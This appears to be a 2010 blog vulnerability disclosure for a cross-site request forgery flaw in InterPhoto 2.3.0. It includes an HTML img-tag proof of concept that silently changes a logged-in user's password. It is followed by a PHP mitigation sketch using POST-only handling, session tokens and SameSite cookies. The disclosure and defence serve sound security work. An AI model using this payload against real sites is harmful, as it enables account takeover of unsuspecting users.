This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

InterPhoto 2.3.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in InterPhoto 2.3.0 can be exploited to change a user's password.

PoC
<html>
<body>
<img src="http://localhost/interphoto/mydesk.edit.php?action=updateuser&password=newpassword&repassword=newpassword&email=a%40a.com&userfullname=&usercompany=&useraddress=&userpostcode=&usertel=&userfax=&useronline=&userwebsite=" />
</body>
</html>
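
The PoC works because the password change is accepted over GET with no per-session secret in the request. One way a handler could refuse such a request, as an added example that is not InterPhoto's code or part of the original post: `action`, `password` and `repassword` come from the PoC URL, while the `csrf_token` field and every function name are assumptions made for this sketch.

```php
<?php
// Added example: a hypothetical handler, not InterPhoto's code.
// "action", "password" and "repassword" come from the PoC URL;
// the "csrf_token" field and all function names are assumptions.

// SameSite (PHP 7.3+) keeps the session cookie off cross-site loads such as <img>.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// One random token per session, embedded in the profile form as a hidden field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES) . '">';
}

// Returns null when the update may proceed, otherwise the reason for refusing it.
function reject_reason(string $method, array $post, array $session): ?string {
    if ($method !== 'POST') {
        return 'password change must be sent with POST'; // the PoC is a GET
    }
    $sent = $post['csrf_token'] ?? null;
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || !is_string($expected) || $expected === ''
        || !hash_equals($expected, $sent)) { // constant-time comparison
        return 'missing or invalid CSRF token';
    }
    if (!is_string($post['password'] ?? null) || $post['password'] === ''
        || $post['password'] !== ($post['repassword'] ?? null)) {
        return 'password and repassword must match';
    }
    return null;
}

if (($_REQUEST['action'] ?? '') === 'updateuser') {
    $why = reject_reason($_SERVER['REQUEST_METHOD'] ?? 'GET', $_POST, $_SESSION);
    if ($why !== null) {
        http_response_code(403);
        exit($why);
    }
    // Checks passed: the application's own account update runs from here.
}
```

With this check in place the request in the PoC is refused at the first test, and a cross-site POST is refused at the second because the forging page cannot read the victim's session token.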
